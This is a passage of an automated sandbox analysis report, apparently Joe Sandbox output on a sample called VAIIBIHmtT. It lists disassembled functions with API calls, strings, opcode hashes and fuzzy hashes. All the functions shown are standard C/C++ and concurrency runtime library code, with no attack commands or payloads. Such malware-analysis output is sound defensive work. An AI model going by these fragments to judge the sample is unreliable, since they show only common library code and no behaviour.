                                                        • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                        • Instruction ID: b0d532a26f63f6046bced7af3b1e02d5ba17ec3ebf316f442b0a79b2244c41dd
                                                        • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                        • Instruction Fuzzy Hash: 3F01F232700120ABCF16AE569811AFF779AAF90354F41001BFC11A7282CA34FD2192A8
                                                        Function 00405944 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog3_GS.LIBCMT ref: 0040594B
                                                          • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405996
                                                        • __Getcoll.LIBCPMT ref: 004059A5
                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 004059B5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                        • String ID:
                                                        • API String ID: 1836011271-0
                                                        • Opcode ID: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                        • Instruction ID: 9fd44fd2a3ed9f30d206a08b807669c32d498cc680062da3e3aec36702d876a7
                                                        • Opcode Fuzzy Hash: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                        • Instruction Fuzzy Hash: 710135B1920209DFDB10EFA5C48279DBBB0FF00314F00813EE445AB281DB789984CF99
                                                        Function 00404E88 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog3_GS.LIBCMT ref: 00404E8F
                                                          • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EDA
                                                        • __Getcoll.LIBCPMT ref: 00404EE9
                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404EF9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                        • String ID:
                                                        • API String ID: 1836011271-0
                                                        • Opcode ID: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                        • Instruction ID: 32d9f0e851cf819fcbf451bbe4f834ae4b9dc531d1d0ebefa622e2c81c742f75
                                                        • Opcode Fuzzy Hash: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                        • Instruction Fuzzy Hash: 9F015771910209DFEB10EFA5C48179DB7B0BF80314F00813EE445AB281DB789984CB99
                                                        Function 0041BEF7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF39
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF49
                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF5D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Compare_exchange_acquire_4std::_
                                                        • String ID:
                                                        • API String ID: 3973403980-0
                                                        • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                        • Instruction ID: 72732f5efe9b63b971529a3f0cd962c81f2cd17cb7f3a1b82d9d198b59e5c030
                                                        • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                        • Instruction Fuzzy Hash: FB01F63608414DBBCF129E64DC428EE3B26EB08354B148416FD18C4232C336CAB2AF8E
                                                        Function 0040D244 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110FB
                                                          • Part of subcall function 0041096D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041098F
                                                          • Part of subcall function 0041096D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 004109B0
                                                        • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041110E
                                                        • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0041111A
                                                        • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411123
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                        • String ID:
                                                        • API String ID: 4284812201-0
                                                        • Opcode ID: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                        • Instruction ID: 32ef31896b2cb6abdcbb34161c10e74fd4bf83775755d0cce9f66a209d269357
                                                        • Opcode Fuzzy Hash: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                        • Instruction Fuzzy Hash: 5EF02470A8020467DF24BBA648525EE72954F84328F14003FB7126B7D2CEBC4DC2929C
                                                        Function 0041352C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413545
                                                          • Part of subcall function 004128CF: ___crtGetTimeFormatEx.LIBCMT ref: 004128E5
                                                          • Part of subcall function 004128CF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00412904
                                                        • GetLastError.KERNEL32 ref: 00413561
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413577
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00413585
                                                          • Part of subcall function 004126A5: SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                        • String ID:
                                                        • API String ID: 1674182817-0
                                                        • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                        • Instruction ID: d4d0e34155d1b65ea1fa919a817b0ae51ac78690af07c02d22dcd9fb344bc12c
                                                        • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                        • Instruction Fuzzy Hash: 80F0E2B1A002193AE720BA765D07FFB369C9B00B90F90081BB905E6082EDDCD95042BC
                                                        Function 00412611 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 00412628
                                                        • GetLastError.KERNEL32(?,?,?,?,004185E9,?,?,?,?,00000000,?,00000000), ref: 00412637
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041264D
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041265B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                        • String ID:
                                                        • API String ID: 3803302727-0
                                                        • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                        • Instruction ID: 0dfe4b91b17fca29e91fbe1ee06f4a4a2df34707d6a261af2a3e5670f24271a8
                                                        • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                        • Instruction Fuzzy Hash: 34F0A07460010EBBCF10EFA5DE45EEF37686B00705F600656B514E20E1DA78DA149768
                                                        Function 00412336 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___crtCreateEventExW.LIBCPMT ref: 0041234C
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00410B59), ref: 0041235A
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412370
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041237E
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                        • String ID:
                                                        • API String ID: 200240550-0
                                                        • Opcode ID: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                        • Instruction ID: f5537a877189a90aa28975f9b1b11099a3717870695f97e2c6136de35ce4b3b1
                                                        • Opcode Fuzzy Hash: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                        • Instruction Fuzzy Hash: ADE0D871A0021E29E720B7768D07FBF369C6B00B45F54086BBD14E11C3FDACD61041AC
                                                        Function 004192E9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00412712: TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                        • TlsAlloc.KERNEL32(?,00410B59), ref: 0042399F
                                                        • GetLastError.KERNEL32 ref: 004239B1
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239C7
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004239D5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                        • String ID:
                                                        • API String ID: 3735082963-0
                                                        • Opcode ID: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                        • Instruction ID: 6dd5cecd5731d0fd3396096e4a73a475127880a88571f9a1564212530dcc10d0
                                                        • Opcode Fuzzy Hash: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                        • Instruction Fuzzy Hash: C9E02BF45003245EC310BF72AD4A66F3274790170AB600E2BF015D2192EEBCD1844A9C
                                                        Function 0041254D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B59,?,?,?,00000000), ref: 00412557
                                                        • GetLastError.KERNEL32(?,?,?,00000000), ref: 00412566
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041257C
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041258A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                        • String ID:
                                                        • API String ID: 3016159387-0
                                                        • Opcode ID: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                        • Instruction ID: 951ac86653187ea2db5183bbef748415e33b6f8be8890effbe132357fd44ea8b
                                                        • Opcode Fuzzy Hash: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                        • Instruction Fuzzy Hash: 69E04874A0010DABC714EFB5DF49AEF73BC7A00A45FA00466A501E2151EA6CDB04977D
                                                        Function 004126A5 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                        • GetLastError.KERNEL32 ref: 004126BD
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126D3
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004126E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                        • String ID:
                                                        • API String ID: 4286982218-0
                                                        • Opcode ID: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                        • Instruction ID: d6ad487b4c18070c6cf6a1f44c15ecb3f6d05e9c3d6252d545de6a15e1df0045
                                                        • Opcode Fuzzy Hash: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                        • Instruction Fuzzy Hash: BBE086746001196BCB24BF61DE06BFF376C7B00745F50082BB515D50A1EF7DD56486AC
                                                        Function 0041276B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • TlsSetValue.KERNEL32(?,00000000,00417991,00000000,?,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412777
                                                        • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412783
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412799
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004127A7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                        • String ID:
                                                        • API String ID: 1964976909-0
                                                        • Opcode ID: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                        • Instruction ID: 402fe0f5bbe0f151a29ab6283833ac733f3ad497baf8671b47c41dc8f6c9e06d
                                                        • Opcode Fuzzy Hash: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                        • Instruction Fuzzy Hash: F7E086746001196BDB20BF65DE09BFF37AC7F00745F50082AB515D50A1EE7DD564869C
                                                        Function 00412712 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                        • GetLastError.KERNEL32 ref: 00412725
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041273B
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00412749
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                        • String ID:
                                                        • API String ID: 3103352999-0
                                                        • Opcode ID: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                        • Instruction ID: 41d26ccb9910f396398e3bce7d3f30876e3ac6ee5b10193dd838f65c512c27a9
                                                        • Opcode Fuzzy Hash: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                        • Instruction Fuzzy Hash: F8E0C274500119678728BB759E0AABF73687A01759BA00A6BF031D20E1EEACD45842AC
                                                        Function 0042F09D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 0042F12D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__start
                                                        • String ID: pow
                                                        • API String ID: 3213639722-2276729525
                                                        • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                        • Instruction ID: ab4d94818e4fdfc694d7abd88a5ac0d422e49d456205366947d10b0b41845edd
                                                        • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                        • Instruction Fuzzy Hash: CA518D61B04202D6CB117714E90137BABB0EB54B10FE4597FF491463A9EE2E8CA99A4F
                                                        Function 0043AE89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0E4,?,00000050,?,?,?,?,?), ref: 0043AF64
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ACP$OCP
                                                        • API String ID: 0-711371036
                                                        • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                        • Instruction ID: 994420f7c07a265647d1fb29ceaf4862ceaaa8a779cd6f75aafce353e6124497
                                                        • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                        • Instruction Fuzzy Hash: 122108A2BC0101A6EB30DB14C90279B7266EF6CB10F569527E98AD7340E73ADD11C35E
                                                        Function 00401F26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F41
                                                        • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F66
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: EncodersGdipImage$Size
                                                        • String ID: image/png
                                                        • API String ID: 864223233-2966254431
                                                        • Opcode ID: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                        • Instruction ID: 499c26c8a42b7bd5ccc1bf70bc14c74cf5c012d897e463d4ef063c4de499c351
                                                        • Opcode Fuzzy Hash: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                        • Instruction Fuzzy Hash: 73119176D0410ABFCB019FA9988189EBB76EE41321B60027BE810B32A0C7795E559A58
                                                        Function 00410EB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: SpinWait
                                                        • String ID: 11@
                                                        • API String ID: 2810355486-1785270423
                                                        • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                        • Instruction ID: 2c89d4891b65b71c58f4df53b819bdc9dd2f83fb67093c95cbfc0296fa784990
                                                        • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                        • Instruction Fuzzy Hash: 2001B5315147228FCA355F3AE5197ABBBD1EB01721B14892FE05683764C6E9DCC2CB88
                                                        Function 004353E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,23E85006,00000001,?,?), ref: 00435451
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: String
                                                        • String ID: 11@$LCMapStringEx
                                                        • API String ID: 2568140703-3516914342
                                                        • Opcode ID: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                        • Instruction ID: 91de7e3331bdbfbcb41da95f7e05f6e44d66f1f0f0f9d36e296516fe988f38a3
                                                        • Opcode Fuzzy Hash: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                        • Instruction Fuzzy Hash: 2B014C32540209BBCF069F90CD06EEE7FA2EF1C755F148166FE0425161C6BA8931EF89
                                                        Function 0040C535 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C579
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ___std_exception_destroy
                                                        • String ID: f(@$ios_base::failbit set
                                                        • API String ID: 4194217158-3705395444
                                                        • Opcode ID: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                        • Instruction ID: dc76fbcea74a86ab5df7bd62cc1bfab07110206e2b1f370d9d208192458b19b9
                                                        • Opcode Fuzzy Hash: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                        • Instruction Fuzzy Hash: 2BF0B4B2A0022836D2202A56BC41B92F7CC8F40B68F10443FFD04A7682EAF8A94541A8
                                                        Function 0043524A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,0043A95A,?,00000055,00000050), ref: 00435294
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: DefaultUser
                                                        • String ID: 11@$GetUserDefaultLocaleName
                                                        • API String ID: 3358694519-96072240
                                                        • Opcode ID: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                        • Instruction ID: 56ecbbb9c6e0ea3c164d002f9608a712f4b6e8dd4fbc805ea42157dacaae974e
                                                        • Opcode Fuzzy Hash: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                        • Instruction Fuzzy Hash: 3DF02431A80208BBDB10AF51CC03F9E7F50EB09B50F10416AFD046A291DAB95E209ACD
                                                        Function 00435313 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • IsValidLocale.KERNEL32(00000000,00430853,00000000,00000001,?,?,00430853,?,?,00430233,?,00000004), ref: 0043535F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: LocaleValid
                                                        • String ID: 11@$IsValidLocaleName
                                                        • API String ID: 1901932003-3041995494
                                                        • Opcode ID: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                        • Instruction ID: 92ee9c0e94e9f2fbea2cc18d2d1159cfcb308c2a760149ff5b58bb71b949f05c
                                                        • Opcode Fuzzy Hash: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                        • Instruction Fuzzy Hash: 94F02430A84708B7DB10AB108D07B9EBB549B48B12F10403ABD0066281CAF95911A59D
                                                        Function 004352B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0043255D,-00000020,00000FA0,00000000,00000014,00402866), ref: 004352FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpin
                                                        • String ID: 11@$InitializeCriticalSectionEx
                                                        • API String ID: 2593887523-3358978645
                                                        • Opcode ID: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                        • Instruction ID: 2051ed9e425ee247f5129d915950feebf7d6a3be7f43922744b44a15a137ba2f
                                                        • Opcode Fuzzy Hash: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                        • Instruction Fuzzy Hash: 2FF0B431A40208BBDB11AF51DD02D9F7F61EB08B51F10406AFD0556260DABA4E20EAC9
                                                        Function 004406AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: H_prolog3_catch
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3886170330-2084237596
                                                        • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
